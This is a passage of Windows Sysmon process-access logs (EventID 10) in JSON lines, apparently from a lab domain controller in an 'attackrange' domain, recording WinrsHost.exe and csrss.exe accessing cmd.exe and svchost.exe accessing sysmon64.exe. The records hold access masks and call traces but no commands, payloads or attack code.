{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nSourceProcessId: 1348\r\nSourceThreadId: 4252\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-001012B01100}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00100BAD1100}","SourceProcessId":"1348","SourceThreadId":"4252","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-001012B01100}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-001012B01100}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-001012B01100}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 